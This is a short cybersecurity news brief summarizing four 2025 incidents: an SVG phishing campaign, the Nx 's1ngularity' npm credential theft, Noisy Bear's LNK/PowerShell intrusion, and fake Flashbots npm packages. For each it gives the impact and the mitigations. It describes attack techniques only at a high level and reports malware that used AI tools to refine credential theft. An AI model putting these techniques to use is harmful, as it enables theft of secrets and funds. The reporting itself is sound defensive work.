svoboda.center Logo svoboda.center

Svoboda Cybersecurity Brief September 07, 2025

Private VPN — just $1.2/mo

SVG Phishing Campaign Targets Colombian Government with Malware-Laden Files

VirusTotal identified a phishing campaign using SVG files to impersonate Colombia’s judicial system, delivering malware through password-protected ZIP archives. The campaign leveraged SVG’s <foreignObject> element to execute JavaScript, bypassing traditional AV detection, and was discovered via VirusTotal’s AI Code Insight feature. Over 500 previously undetected SVG files were linked to the campaign.
Impact: Delivers malware via sideloading a malicious DLL, potentially compromising systems.
Mitigation: Block SVG files in emails, educate users on unexpected downloads, and monitor for suspicious ZIP archives.
Source: BleepingComputer

NPM “s1ngularity” Attack Leaks GitHub Tokens and Secrets via AI-Powered Malware

A compromised Nx repository on NPM distributed malware stealing GitHub tokens, SSH keys, and crypto wallets via a post-install script, leveraging AI tools (Claude, Gemini) to refine credential theft. The attack exposed 2,180 accounts and 7,200 repositories across three phases, including flipping private repos to public.
Impact: Widespread exposure of sensitive secrets, ongoing risks due to valid tokens.
Mitigation: Revoke leaked tokens, enforce 2FA, adopt NPM’s Trusted Publisher model, audit GitHub Actions workflows.
Source: BleepingComputer

Noisy Bear Targets Kazakhstan Energy Sector with BarrelFire Phishing Campaign

The Russian-linked Noisy Bear group attacked Kazakhstan’s KazMunaiGas using phishing emails with malicious LNK files, deploying DOWNSHELL PowerShell loader and a DLL implant. The campaign mimicked internal communications and used Aeza Group bulletproof hosting.
Impact: Initial reconnaissance and reverse shell access for further exploitation.
Mitigation: Block suspicious LNK files, monitor for DLL sideloading, restrict PowerShell execution.
Source: TheHackerNews

Malicious npm Packages Impersonate Flashbots to Steal Ethereum Wallet Keys

Four npm packages (e.g., @flashbotts/ethers-provider-bundle) impersonated Flashbots SDKs, stealing Ethereum private keys and mnemonic seeds via Telegram bots. One package redirected unsigned transactions to attacker-controlled wallets.
Impact: Irreversible theft of cryptocurrency funds.
Mitigation: Audit npm dependencies, verify package publishers, monitor for unauthorized wallet activity.
Source: TheHackerNews

Share this brief: https://svo.bz/4zcp

If you want to support us, you can donate here: Donate